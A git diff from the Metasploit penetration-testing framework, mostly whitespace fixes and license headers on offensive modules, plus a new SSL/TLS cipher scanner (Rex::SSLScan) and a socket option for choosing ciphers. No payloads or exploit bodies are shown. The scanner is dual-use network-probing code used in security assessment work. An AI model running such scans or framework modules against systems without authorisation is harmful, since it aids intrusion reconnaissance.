-265,7 +265,7 @@ FILE_VOLUME_IS_COMPRESSED = 0x00008000 # SMB Error Codes SMB_STATUS_SUCCESS = 0x00000000 SMB_ERROR_BUFFER_OVERFLOW = 0x80000005 -SMB_STATUS_MORE_PROCESSING_REQUIRED = 0xC0000016 +SMB_STATUS_MORE_PROCESSING_REQUIRED = 0xC0000016 SMB_STATUS_ACCESS_DENIED = 0xC0000022 SMB_STATUS_LOGON_FAILURE = 0xC000006D diff --git a/lib/rex/proto/smb/utils.rb b/lib/rex/proto/smb/utils.rb index f9cb3681c0..63f43ab655 100644 --- a/lib/rex/proto/smb/utils.rb +++ b/lib/rex/proto/smb/utils.rb @@ -20,11 +20,11 @@ CONST = Rex::Proto::SMB::Constants } return access end - + # Creates a mode mask for use with the CLIENT.open() call based on a string def self.open_mode_to_mode(str) mode = 0 - + str.each_byte { |c| case [c].pack('C').downcase when 'x' # Fail if the file already exists @@ -32,7 +32,7 @@ CONST = Rex::Proto::SMB::Constants when 't' # Truncate the file if it already exists mode |= CONST::OPEN_MODE_TRUNC when 'c' # Create the file if it does not exist - mode |= CONST::OPEN_MODE_CREAT + mode |= CONST::OPEN_MODE_CREAT when 'o' # Just open the file, clashes with x mode |= CONST::OPEN_MODE_OPEN end @@ -40,7 +40,7 @@ CONST = Rex::Proto::SMB::Constants return mode end - + # Returns a disposition value for smb.create based on permission string def self.create_mode_to_disposition(str) str.each_byte { |c| @@ -83,7 +83,7 @@ CONST = Rex::Proto::SMB::Constants end return encoded end - + # Convert a name from its NetBIOS equivalent def self.nbname_decode(str) decoded = '' diff --git a/lib/rex/proto/tftp/client.rb b/lib/rex/proto/tftp/client.rb index 90dcf85717..daec9cacf5 100644 --- a/lib/rex/proto/tftp/client.rb +++ b/lib/rex/proto/tftp/client.rb @@ -64,7 +64,7 @@ class Client # # Methods for both upload and download # - + def start_server_socket self.server_sock = Rex::Socket::Udp.create( 'LocalHost' => local_host, @@ -138,7 +138,7 @@ class Client # # Methods for download # - + def rrq_packet req = [OpRead, self.remote_file, self.mode] packstr = "na#{self.remote_file.length+1}a#{self.mode.length+1}" @@ -231,7 +231,7 @@ class Client # # Methods for upload # - + def wrq_packet req = [OpWrite, self.remote_file, self.mode] packstr = "na#{self.remote_file.length+1}a#{self.mode.length+1}" diff --git a/lib/rex/proto/tftp/server.rb b/lib/rex/proto/tftp/server.rb index 89af4703cb..c01d18f9a9 100644 --- a/lib/rex/proto/tftp/server.rb +++ b/lib/rex/proto/tftp/server.rb @@ -173,7 +173,7 @@ class Server attr_accessor :listen_host, :listen_port, :context attr_accessor :sock, :files, :transfers, :uploaded attr_accessor :thread - + attr_accessor :incoming_file_hook protected @@ -189,9 +189,9 @@ protected def save_output(tr) self.uploaded << tr[:file] - + return incoming_file_hook.call(tr) if incoming_file_hook - + if @output_dir fn = tr[:file][:name].split(File::SEPARATOR)[-1] if fn diff --git a/lib/rex/registry/lfkey.rb b/lib/rex/registry/lfkey.rb index 29916ad179..78009c6cee 100644 --- a/lib/rex/registry/lfkey.rb +++ b/lib/rex/registry/lfkey.rb @@ -24,7 +24,7 @@ class LFBlock hash_offset = offset + 0x04 1.upto(@number_of_keys) do |h| - + hash = LFHashRecord.new(hive_blob, hash_offset) @hash_records << hash @@ -39,7 +39,7 @@ end class LFHashRecord attr_accessor :nodekey_offset, :nodekey_name_verification - + def initialize(hive_blob, offset) @nodekey_offset = hive_blob[offset, 4].unpack('l').first @nodekey_name_verification = hive_blob[offset+0x04, 4].to_s diff --git a/lib/rex/ropbuilder/rop.rb b/lib/rex/ropbuilder/rop.rb index aee2c11d26..15f34535a4 100644 --- a/lib/rex/ropbuilder/rop.rb +++ b/lib/rex/ropbuilder/rop.rb @@ -217,7 +217,7 @@ class RopCollect < RopBase # get raw bytes buf = @disassembler.read_raw_data(addr, x + xtra) - + # make sure disassembling forward leads to our instruction next if not ends_with_addr(buf, addr, ea) diff --git a/lib/rex/socket.rb b/lib/rex/socket.rb index 8e37cf3719..7a93bbc9be 100644 --- a/lib/rex/socket.rb +++ b/lib/rex/socket.rb @@ -461,14 +461,14 @@ module Socket def self.eth_aton(mac) mac.split(":").map{|c| c.to_i(16) }.pack("C*") end - + # # Converts a 6-byte binary string into a colon-delimited MAC address # def self.eth_ntoa(bin) bin.unpack("C6").map{|x| "%.2x" % x }.join(":").upcase end - + # # Converts a CIDR subnet into an array (base, bcast) # diff --git a/lib/rex/socket/comm.rb b/lib/rex/socket/comm.rb index c2ed353517..9be12ad06f 100644 --- a/lib/rex/socket/comm.rb +++ b/lib/rex/socket/comm.rb @@ -16,7 +16,7 @@ module Socket module Comm ### - # + # # This mixin provides stubs for event notification handlers that can be # registered with a Comm factory to be called when various events occur, # such as socket instantiation. diff --git a/lib/rex/socket/parameters.rb b/lib/rex/socket/parameters.rb index 35c1288739..e83783e843 100644 --- a/lib/rex/socket/parameters.rb +++ b/lib/rex/socket/parameters.rb @@ -140,10 +140,15 @@ class Rex::Socket::Parameters self.ssl = false end - if (hash['SSLVersion'] and hash['SSLVersion'].to_s =~ /^(SSL2|SSL3|TLS1)$/i) + supported_ssl_versions = ['SSL2', 'SSL23', 'TLS1', 'SSL3', :SSLv2, :SSLv3, :SSLv23, :TLSv1] + if (hash['SSLVersion'] and supported_ssl_versions.include? hash['SSLVersion']) self.ssl_version = hash['SSLVersion'] end + if (hash['SSLCipher']) + self.ssl_cipher = hash['SSLCipher'] + end + if (hash['SSLCert'] and ::File.file?(hash['SSLCert'])) begin self.ssl_cert = ::File.read(hash['SSLCert']) @@ -338,6 +343,11 @@ class Rex::Socket::Parameters # attr_accessor :ssl_version # + # What specific SSL Cipher(s) to use, may be a string containing the cipher name + # or an array of strings containing cipher names e.g. ["DHE-RSA-AES256-SHA", "DHE-DSS-AES256-SHA"] + # + attr_accessor :ssl_cipher + # # The SSL certificate, in pem format, stored as a string. See +SslTcpServer#make_ssl+ # attr_accessor :ssl_cert diff --git a/lib/rex/socket/ssl_tcp.rb b/lib/rex/socket/ssl_tcp.rb index 2620808c41..0e9d662ea3 100644 --- a/lib/rex/socket/ssl_tcp.rb +++ b/lib/rex/socket/ssl_tcp.rb @@ -1,6 +1,5 @@ # -*- coding: binary -*- require 'rex/socket' - ### # # This class provides methods for interacting with an SSL TCP client @@ -60,11 +59,11 @@ begin version = :SSLv3 if(params) case params.ssl_version - when 'SSL2' + when 'SSL2', :SSLv2 version = :SSLv2 - when 'SSL23' + when 'SSL23', :SSLv23 version = :SSLv23 - when 'TLS1' + when 'TLS1', :TLSv1 version = :TLSv1 end end @@ -81,6 +80,9 @@ begin # VERIFY_PEER self.sslctx.verify_mode = OpenSSL::SSL::VERIFY_PEER self.sslctx.options = OpenSSL::SSL::OP_ALL + if params.ssl_cipher + self.sslctx.ciphers = params.ssl_cipher + end # Set the verification callback self.sslctx.verify_callback = Proc.new do |valid, store| diff --git a/lib/rex/socket/subnet_walker.rb b/lib/rex/socket/subnet_walker.rb index b781f08234..c90c3e7f33 100644 --- a/lib/rex/socket/subnet_walker.rb +++ b/lib/rex/socket/subnet_walker.rb @@ -48,7 +48,7 @@ class SubnetWalker end self.curr_ip_idx += 1 - + self.curr_ip.join('.') end diff --git a/lib/rex/sslscan/result.rb b/lib/rex/sslscan/result.rb new file mode 100644 index 0000000000..5dcc1211f3 --- /dev/null +++ b/lib/rex/sslscan/result.rb @@ -0,0 +1,200 @@ + +require 'rex/socket' +require 'rex/ui/text/table' + +module Rex::SSLScan +class Result + + attr_accessor :openssl_sslv2 + + attr_reader :ciphers + attr_reader :supported_versions + + def initialize() + @cert = nil + @ciphers = Set.new + @supported_versions = [:SSLv2, :SSLv3, :TLSv1] + end + + def cert + @cert + end + + def cert=(input) + unless input.kind_of? OpenSSL::X509::Certificate or input.nil? + raise ArgumentError, "Must be an X509 Cert!" + end + @cert = input + end + + def sslv2 + @ciphers.reject{|cipher| cipher[:version] != :SSLv2 } + end + + def sslv3 + @ciphers.reject{|cipher| cipher[:version] != :SSLv3 } + end + + def tlsv1 + @ciphers.reject{|cipher| cipher[:version] != :TLSv1 } + end + + def weak_ciphers + accepted.reject{|cipher| cipher[:weak] == false } + end + + def strong_ciphers + accepted.reject{|cipher| cipher[:weak] } + end + + # Returns all accepted ciphers matching the supplied version + # @param version [Symbol, Array] The SSL Version to filter on + # @raise [ArgumentError] if the version supplied is invalid + # @return [Array] An array of accepted cipher details matching the supplied versions + def accepted(version = :all) + enum_ciphers(:accepted, version) + end + + # Returns all rejected ciphers matching the supplied version + # @param version [Symbol, Array] The SSL Version to filter on + # @raise [ArgumentError] if the version supplied is invalid + # @return [Array] An array of rejected cipher details matching the supplied versions + def rejected(version = :all) + enum_ciphers(:rejected, version) + end + + def each_accepted(version = :all) + accepted(version).each do |cipher_result| + yield cipher_result + end + end + + def each_rejected(version = :all) + rejected(version).each do |cipher_result| + yield cipher_result + end + end + + def supports_sslv2? + !(accepted(:SSLv2).empty?) + end + + def supports_sslv3? + !(accepted(:SSLv3).empty?) + end + + def supports_tlsv1? + !(accepted(:TLSv1).empty?) + end + + def supports_ssl? + supports_sslv2? or supports_sslv3? or supports_tlsv1? + end + + def supports_weak_ciphers? + !(weak_ciphers.empty?) + end + + def standards_compliant? + if supports_ssl? + return false if supports_sslv2? + return false if supports_weak_ciphers? + end + true + end + + # Adds the details of a cipher test to the Result object. + # @param version [Symbol] the SSL Version + # @param cipher [String] the SSL cipher + # @param key_length [Fixnum] the length of encryption key + # @param status [Symbol] :accepted or :rejected + def add_cipher(version, cipher, key_length, status) + unless @supported_versions.include? version + raise ArgumentError, "Must be a supported SSL Version" + end + unless OpenSSL::SSL::SSLContext.new(version).ciphers.flatten.include? cipher + raise ArgumentError, "Must be a valid SSL Cipher for #{version}!" + end + unless key_length.kind_of? Fixnum + raise ArgumentError, "Must supply a valid key length" + end + unless [:accepted, :rejected].include? status + raise ArgumentError, "Status must be either :accepted or :rejected" + end + + strong_cipher_ctx = OpenSSL::SSL::SSLContext.new(version) + # OpenSSL Directive For Strong Ciphers + # See: http://www.rapid7.com/vulndb/lookup/ssl-weak-ciphers + strong_cipher_ctx.ciphers = "ALL:!aNULL:!eNULL:!LOW:!EXP:RC4+RSA:+HIGH:+MEDIUM" + + if strong_cipher_ctx.ciphers.flatten.include? cipher + weak = false + else + weak = true + end + + cipher_details = {:version => version, :cipher => cipher, :key_length => key_length, :weak => weak, :status => status} + @ciphers << cipher_details + end + + def to_s + unless supports_ssl? + return "Server does not appear to support SSL on this port!" + end + table = Rex::Ui::Text::Table.new( + 'Header' => 'SSL Ciphers', + 'Indent' => 1, + 'Columns' => ['Status', 'Weak', 'SSL Version', 'Key Length', 'Cipher'], + 'SortIndex' => -1 + ) + ciphers.each do |cipher| + if cipher[:weak] + weak = '*' + else + weak = ' ' + end + table << [cipher[:status].to_s.capitalize, weak , cipher[:version], cipher[:key_length], cipher[:cipher]] + end + + # Sort by SSL Version, then Key Length, and then Status + table.rows.sort_by!{|row| [row[0],row[2],row[3]]} + text = "#{table.to_s}" + if @cert + text << " \n\n #{@cert.to_text}" + end + if openssl_sslv2 == false + text << "\n\n *** WARNING: Your OS hates freedom! Your OpenSSL libs are compiled without SSLv2 support!" + end + text + end + + protected + + # @param state [Symbol] Either :accepted or :rejected + # @param version [Symbol, Array] The SSL Version to filter on (:SSLv2, :SSLv3, :TLSv1, :all) + # @return [Set] The Set of cipher results matching the filter criteria + def enum_ciphers(state, version = :all) + case version + when Symbol + case version + when :all + return @ciphers.select{|cipher| cipher[:status] == state} + when :SSLv2, :SSLv3, :TLSv1 + return @ciphers.select{|cipher| cipher[:status] == state and cipher[:version] == version} + else + raise ArgumentError, "Invalid SSL Version Supplied: #{version}" + end + when Array + version = version.reject{|v| !(@supported_versions.include? v)} + if version.empty? + return @ciphers.select{|cipher| cipher[:status] == state} + else + return @ciphers.select{|cipher| cipher[:status] == state and version.include? cipher[:version]} + end + else + raise ArgumentError, "Was expecting Symbol or Array and got #{version.class}" + end + end + +end +end diff --git a/lib/rex/sslscan/scanner.rb b/lib/rex/sslscan/scanner.rb new file mode 100644 index 0000000000..f751bc8dd1 --- /dev/null +++ b/lib/rex/sslscan/scanner.rb @@ -0,0 +1,205 @@ +require 'rex/socket' +require 'rex/sslscan/result' + +module Rex::SSLScan + +class Scanner + + attr_accessor :context + attr_accessor :host + attr_accessor :port + attr_accessor :timeout + + attr_reader :supported_versions + attr_reader :sslv2 + + # Initializes the scanner object + # @param host [String] IP address or hostname to scan + # @param port [Fixnum] Port number to scan, default: 443 + # @param timeout [Fixnum] Timeout for connections, in seconds. default: 5 + # @raise [StandardError] Raised when the configuration is invalid + def initialize(host,port = 443,context = {},timeout=5) + @host = host + @port = port + @timeout = timeout + @context = context + if check_opensslv2 == true + @supported_versions = [:SSLv2, :SSLv3, :TLSv1] + @sslv2 = true + else + @supported_versions = [:SSLv3, :TLSv1] + @sslv2 = false + end + raise StandardError, "The scanner configuration is invalid" unless valid? + end + + # Checks whether the scanner option has a valid configuration + # @return [Boolean] True or False, the configuration is valid. + def valid? + begin + @host = Rex::Socket.getaddress(@host, true) + rescue + return false + end + return false unless @port.kind_of? Fixnum + return false unless @port >= 0 and @port <= 65535 + return false unless @timeout.kind_of? Fixnum + return true + end + + # Initiate the Scan against the target. Will test each cipher one at a time. + # @return [Result] object containing the details of the scan + def scan + scan_result = Rex::SSLScan::Result.new + scan_result.openssl_sslv2 = sslv2 + # If we can't get any SSL connection, then don't bother testing + # individual ciphers. + if test_ssl == :rejected and test_tls == :rejected + return scan_result + end + + @supported_versions.each do |ssl_version| + sslctx = OpenSSL::SSL::SSLContext.new(ssl_version) + sslctx.ciphers.each do |cipher_name, ssl_ver, key_length, alg_length| + status = test_cipher(ssl_version, cipher_name) + scan_result.add_cipher(ssl_version, cipher_name, key_length, status) + if status == :accepted and scan_result.cert.nil? + scan_result.cert = get_cert(ssl_version, cipher_name) + end + end + end + scan_result + end + + def test_ssl + begin + scan_client = Rex::Socket::Tcp.create( + 'Context' => @context, + 'PeerHost' => @host, + 'PeerPort' => @port, + 'SSL' => true, + 'SSLVersion' => :SSLv23, + 'Timeout' => @timeout + ) + rescue ::Exception => e + return :rejected + ensure + if scan_client + scan_client.close + end + end + return :accepted + end + + def test_tls + begin + scan_client = Rex::Socket::Tcp.create( + 'Context' => @context, + 'PeerHost' => @host, + 'PeerPort' => @port, + 'SSL' => true, + 'SSLVersion' => :TLSv1, + 'Timeout' => @timeout + ) + rescue ::Exception => e + return :rejected + ensure + if scan_client + scan_client.close + end + end + return :accepted + end + + # Tests the specified SSL Version and Cipher against the configured target + # @param ssl_version [Symbol] The SSL version to use (:SSLv2, :SSLv3, :TLSv1) + # @param cipher [String] The SSL Cipher to use + # @return [Symbol] Either :accepted or :rejected + def test_cipher(ssl_version, cipher) + validate_params(ssl_version,cipher) + begin + scan_client = Rex::Socket::Tcp.create( + 'Context' => @context, + 'PeerHost' => @host, + 'PeerPort' => @port, + 'SSL' => true, + 'SSLVersion' => ssl_version, + 'SSLCipher' => cipher, + 'Timeout' => @timeout + ) + rescue ::Exception => e + return :rejected + ensure + if scan_client + scan_client.close + end + end + + return :accepted + end + + # Retrieve the X509 Cert from the target service, + # @param ssl_version [Symbol] The SSL version to use (:SSLv2, :SSLv3, :TLSv1) + # @param cipher [String] The SSL Cipher to use + # @return [OpenSSL::X509::Certificate] if the certificate was retrieved + # @return [Nil] if the cert couldn't be retrieved + def get_cert(ssl_version, cipher) + validate_params(ssl_version,cipher) + begin + scan_client = Rex::Socket::Tcp.create( + 'PeerHost' => @host, + 'PeerPort' => @port, + 'SSL' => true, + 'SSLVersion' => ssl_version, + 'SSLCipher' => cipher, + 'Timeout' => @timeout + ) + cert = scan_client.peer_cert + if cert.kind_of? OpenSSL::X509::Certificate + return cert + else + return nil + end + rescue ::Exception => e + return nil + ensure + if scan_client + scan_client.close + end + end + end + + + protected + + # Validates that the SSL Version and Cipher are valid both seperately and + # together as part of an SSL Context. + # @param ssl_version [Symbol] The SSL version to use (:SSLv2, :SSLv3, :TLSv1) + # @param cipher [String] The SSL Cipher to use + # @raise [StandardError] If an invalid or unsupported SSL Version was supplied + # @raise [StandardError] If the cipher is not valid for that version of SSL + def validate_params(ssl_version, cipher) + raise StandardError, "The scanner configuration is invalid" unless valid? + unless @supported_versions.include? ssl_version + raise StandardError, "SSL Version must be one of: #{@supported_versions.to_s}" + end + if ssl_version == :SSLv2 and sslv2 == false + raise StandardError, "Your OS hates freedom! Your OpenSSL libs are compiled without SSLv2 support!" + else + unless OpenSSL::SSL::SSLContext.new(ssl_version).ciphers.flatten.include? cipher + raise StandardError, "Must be a valid SSL Cipher for #{ssl_version}!" + end + end + end + + def check_opensslv2 + begin + OpenSSL::SSL::SSLContext.new(:SSLv2) + rescue + return false + end + return true + end + +end +end diff --git a/lib/rex/struct2/c_struct.rb b/lib/rex/struct2/c_struct.rb index 444b992aa0..fa767a4fa3 100644 --- a/lib/rex/struct2/c_struct.rb +++ b/lib/rex/struct2/c_struct.rb @@ -163,12 +163,12 @@ class CStruct < SStruct return super(index, *other) end end - + # Produce a list of field names def keys @name_table end - + # Iterate through all fields and values def each_pair(&block) @name_table.each do |k| diff --git a/lib/rex/struct2/constant.rb b/lib/rex/struct2/constant.rb index 2dfdc7ec9a..8ea5538e87 100644 --- a/lib/rex/struct2/constant.rb +++ b/lib/rex/struct2/constant.rb @@ -12,7 +12,7 @@ module Struct2 # sized arrays), and probably not a ton more. class Constant - + require 'rex/struct2/element' include Rex::Struct2::Element diff --git a/lib/rex/struct2/generic.rb b/lib/rex/struct2/generic.rb index 217f30e5af..572f025e07 100644 --- a/lib/rex/struct2/generic.rb +++ b/lib/rex/struct2/generic.rb @@ -6,7 +6,7 @@ module Rex module Struct2 class Generic - + require 'rex/struct2/element' include Rex::Struct2::Element @@ -40,7 +40,7 @@ class Generic # example if it is nil. That should only happen for a user # error so that's what I want it to do... string = [ @value ].pack(@packspec) - + if restraint && restraint.max return string.slice(0, restraint.max) else diff --git a/lib/rex/struct2/s_string.rb b/lib/rex/struct2/s_string.rb index 92e8b7605c..199741f36e 100644 --- a/lib/rex/struct2/s_string.rb +++ b/lib/rex/struct2/s_string.rb @@ -6,7 +6,7 @@ module Rex module Struct2 class SString - + require 'rex/struct2/element' require 'rex/struct2/constant' include Rex::Struct2::Element diff --git a/lib/rex/struct2/s_struct.rb b/lib/rex/struct2/s_struct.rb index 0a367c9823..1b4cefb1aa 100644 --- a/lib/rex/struct2/s_struct.rb +++ b/lib/rex/struct2/s_struct.rb @@ -50,7 +50,7 @@ class SStruct elements.each do |e| buff << e.to_s end - + if restraint && restraint.max return buff.slice(0, restraint.max) else diff --git a/lib/rex/sync/thread_safe.rb b/lib/rex/sync/thread_safe.rb index 886cb5f761..4c6cf42158 100644 --- a/lib/rex/sync/thread_safe.rb +++ b/lib/rex/sync/thread_safe.rb @@ -4,7 +4,7 @@ require 'timeout' module Rex ### -# +# # This module provides a set of methods for performing various blocking # operations in a manner that is compatible with ruby style threads. # diff --git a/lib/rex/ui/text/color.rb b/lib/rex/ui/text/color.rb index 5a8b25b90f..b408ffda1e 100644 --- a/lib/rex/ui/text/color.rb +++ b/lib/rex/ui/text/color.rb @@ -90,9 +90,9 @@ module Color # # Colorize if this shell supports it # - def do_colorize(*color) + def do_colorize(*color) supports_color?() ? ansi(*color) : '' end -end +end end end end diff --git a/lib/rex/ui/text/input/socket.rb b/lib/rex/ui/text/input/socket.rb index 82e8469b5e..37cf6f24c4 100644 --- a/lib/rex/ui/text/input/socket.rb +++ b/lib/rex/ui/text/input/socket.rb @@ -34,29 +34,29 @@ class Input::Socket < Rex::Ui::Text::Input # Wait for a line of input to be read from a socket. # def gets - + # Initialize the line buffer line = '' - + # Read data one byte at a time until we see a LF while (true) break if line.include?("\n") - + # Read another character of input char = @sock.getc if char.nil? @sock.close return end - + # Telnet sends 0x04 as EOF if (char == 4) @sock.write("[*] Caught ^D, closing the socket...\n") @sock.close return end - + # Append this character to the string line << char @@ -66,13 +66,13 @@ class Input::Socket < Rex::Ui::Text::Input @sock.write("[*] Caught ^C, closing the socket...\n") @sock.close return - + when /\xff\xed\xff\xfd\x06/ @sock.write("[*] Caught ^Z\n") - return + return end end - + return line end diff --git a/lib/rex/zip/entry.rb b/lib/rex/zip/entry.rb index 8248126dcd..ff41196550 100644 --- a/lib/rex/zip/entry.rb +++ b/lib/rex/zip/entry.rb @@ -6,7 +6,7 @@ module Rex module Zip -# +# # An Entry represents a logical file or directory to be stored in an Archive # class Entry diff --git a/modules/auxiliary/admin/mssql/mssql_ntlm_stealer.rb b/modules/auxiliary/admin/mssql/mssql_ntlm_stealer.rb index eb8924aea7..1d5657ebfd 100644 --- a/modules/auxiliary/admin/mssql/mssql_ntlm_stealer.rb +++ b/modules/auxiliary/admin/mssql/mssql_ntlm_stealer.rb @@ -1,3 +1,10 @@ +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# web site for more information on licensing and terms of use. +# http://metasploit.com/ +## + require 'msf/core' class Metasploit3 < Msf::Auxiliary diff --git a/modules/auxiliary/admin/mssql/mssql_ntlm_stealer_sqli.rb b/modules/auxiliary/admin/mssql/mssql_ntlm_stealer_sqli.rb index b6c9dba312..6bf5e62925 100644 --- a/modules/auxiliary/admin/mssql/mssql_ntlm_stealer_sqli.rb +++ b/modules/auxiliary/admin/mssql/mssql_ntlm_stealer_sqli.rb @@ -1,3 +1,10 @@ +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# web site for more information on licensing and terms of use. +# http://metasploit.com/ +## + require 'msf/core' class Metasploit3 < Msf::Auxiliary diff --git a/modules/auxiliary/admin/natpmp/natpmp_map.rb b/modules/auxiliary/admin/natpmp/natpmp_map.rb index cbd59484ba..be8b13c300 100644 --- a/modules/auxiliary/admin/natpmp/natpmp_map.rb +++ b/modules/auxiliary/admin/natpmp/natpmp_map.rb @@ -1,3 +1,10 @@ +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# web site for more information on licensing and terms of use. +# http://metasploit.com/ +## + require 'msf/core' require 'rex/proto/natpmp' diff --git a/modules/auxiliary/admin/scada/modicon_command.rb b/modules/auxiliary/admin/scada/modicon_command.rb index 6881b15080..4fd6348bb9 100644 --- a/modules/auxiliary/admin/scada/modicon_command.rb +++ b/modules/auxiliary/admin/scada/modicon_command.rb @@ -1,3 +1,10 @@ +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# web site for more information on licensing and terms of use. +# http://metasploit.com/ +## + require 'msf/core' class Metasploit3 < Msf::Auxiliary diff --git a/modules/auxiliary/admin/scada/modicon_stux_transfer.rb b/modules/auxiliary/admin/scada/modicon_stux_transfer.rb index dbbda3a618..09533a1f18 100644 --- a/modules/auxiliary/admin/scada/modicon_stux_transfer.rb +++ b/modules/auxiliary/admin/scada/modicon_stux_transfer.rb @@ -1,3 +1,10 @@ +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# web site for more information on licensing and terms of use. +# http://metasploit.com/ +## + require 'msf/core' class Metasploit3 < Msf::Auxiliary diff --git a/modules/auxiliary/admin/smb/psexec_command.rb b/modules/auxiliary/admin/smb/psexec_command.rb index 7be526fab2..1f438ac858 100644 --- a/modules/auxiliary/admin/smb/psexec_command.rb +++ b/modules/auxiliary/admin/smb/psexec_command.rb @@ -1,4 +1,9 @@ -#!/usr/bin/env ruby +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# web site for more information on licensing and terms of use. +# http://metasploit.com/ +## require 'msf/core' diff --git a/modules/auxiliary/bnat/bnat_scan.rb b/modules/auxiliary/bnat/bnat_scan.rb index b659524639..92f1742f96 100644 --- a/modules/auxiliary/bnat/bnat_scan.rb +++ b/modules/auxiliary/bnat/bnat_scan.rb @@ -2,7 +2,7 @@ # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # web site for more information on licensing and terms of use. -# http://metasploit.com/ +# http://metasploit.com/ ## require 'msf/core' diff --git a/modules/auxiliary/crawler/msfcrawler.rb b/modules/auxiliary/crawler/msfcrawler.rb index 5d9af9fc57..74677fb6ec 100644 --- a/modules/auxiliary/crawler/msfcrawler.rb +++ b/modules/auxiliary/crawler/msfcrawler.rb @@ -1,4 +1,10 @@ -#!/usr/bin/env ruby +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# web site for more information on licensing and terms of use. +# http://metasploit.com/ +## + # # Web Crawler. # diff --git a/modules/auxiliary/docx/word_unc_injector.rb b/modules/auxiliary/docx/word_unc_injector.rb index 926af2a6d3..6461f7f99c 100644 --- a/modules/auxiliary/docx/word_unc_injector.rb +++ b/modules/auxiliary/docx/word_unc_injector.rb @@ -2,7 +2,7 @@ # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. -# http://Metasploit.com/projects/Framework/ +# http://Metasploit.com/projects/Framework/ ## require 'msf/core' diff --git a/modules/auxiliary/dos/ssl/openssl_aesni.rb b/modules/auxiliary/dos/ssl/openssl_aesni.rb index f118a88abb..88dc3f787c 100644 --- a/modules/auxiliary/dos/ssl/openssl_aesni.rb +++ b/modules/auxiliary/dos/ssl/openssl_aesni.rb @@ -1,3 +1,10 @@ +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# web site for more information on licensing and terms of use. +# http://metasploit.com/ +## + # auxilary/dos/ssl/openssl_aesni require 'msf/core' diff --git a/modules/auxiliary/fuzzers/smtp/smtp_fuzzer.rb b/modules/auxiliary/fuzzers/smtp/smtp_fuzzer.rb index b76258cf25..3d679c3376 100644 --- a/modules/auxiliary/fuzzers/smtp/smtp_fuzzer.rb +++ b/modules/auxiliary/fuzzers/smtp/smtp_fuzzer.rb @@ -1,3 +1,10 @@ +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# web site for more information on licensing and terms of use. +# http://metasploit.com/ +## + ## # A Very simple Module to fuzzer some SMTP commands. # It allows to respect the order or just throw everything at it.... diff --git a/modules/auxiliary/gather/natpmp_external_address.rb b/modules/auxiliary/gather/natpmp_external_address.rb index 22591d6907..00e52e93e3 100644 --- a/modules/auxiliary/gather/natpmp_external_address.rb +++ b/modules/auxiliary/gather/natpmp_external_address.rb @@ -1,3 +1,10 @@ +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# web site for more information on licensing and terms of use. +# http://metasploit.com/ +## + require 'msf/core' require 'rex/proto/natpmp' diff --git a/modules/auxiliary/gather/wp_w3_total_cache_hash_extract.rb b/modules/auxiliary/gather/wp_w3_total_cache_hash_extract.rb index e03844bf80..e91efa8cf7 100644 --- a/modules/auxiliary/gather/wp_w3_total_cache_hash_extract.rb +++ b/modules/auxiliary/gather/wp_w3_total_cache_hash_extract.rb @@ -2,7 +2,7 @@ # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # web site for more information on licensing and terms of use. -# http://metasploit.com/ +# http://metasploit.com/ ## require 'msf/core' diff --git a/modules/auxiliary/scanner/discovery/ipv6_multicast_ping.rb b/modules/auxiliary/scanner/discovery/ipv6_multicast_ping.rb index e36abc0759..3403a9ed0e 100644 --- a/modules/auxiliary/scanner/discovery/ipv6_multicast_ping.rb +++ b/modules/auxiliary/scanner/discovery/ipv6_multicast_ping.rb @@ -1,5 +1,8 @@ ## -# $Id: ipv6_multicast_ping.rb 13962 2011-10-17 02:42:01Z todb $ +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# web site for more information on licensing and terms of use. +# http://metasploit.com/ ## require 'msf/core' diff --git a/modules/auxiliary/scanner/discovery/ipv6_neighbor_router_advertisement.rb b/modules/auxiliary/scanner/discovery/ipv6_neighbor_router_advertisement.rb index 3f5814e864..a9b3787fed 100644 --- a/modules/auxiliary/scanner/discovery/ipv6_neighbor_router_advertisement.rb +++ b/modules/auxiliary/scanner/discovery/ipv6_neighbor_router_advertisement.rb @@ -1,3 +1,10 @@ +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# web site for more information on licensing and terms of use. +# http://metasploit.com/ +## + require 'msf/core' class Metasploit3 < Msf::Auxiliary diff --git a/modules/auxiliary/scanner/http/http_traversal.rb b/modules/auxiliary/scanner/http/http_traversal.rb index eedc2a72ce..7af68561c0 100644 --- a/modules/auxiliary/scanner/http/http_traversal.rb +++ b/modules/auxiliary/scanner/http/http_traversal.rb @@ -1,3 +1,10 @@ +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# web site for more information on licensing and terms of use. +# http://metasploit.com/ +## + # # Thanks to: # ipax, neriberto, flambaz, bperry, egypt, and sinn3r for help diff --git a/modules/auxiliary/scanner/misc/cctv_dvr_login.rb b/modules/auxiliary/scanner/misc/cctv_dvr_login.rb index 1af876e682..6e4e82275d 100644 --- a/modules/auxiliary/scanner/misc/cctv_dvr_login.rb +++ b/modules/auxiliary/scanner/misc/cctv_dvr_login.rb @@ -2,7 +2,7 @@ # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. -# http://metasploit.com/framework/ +# http://metasploit.com/framework/ ## require 'msf/core' diff --git a/modules/auxiliary/scanner/natpmp/natpmp_portscan.rb 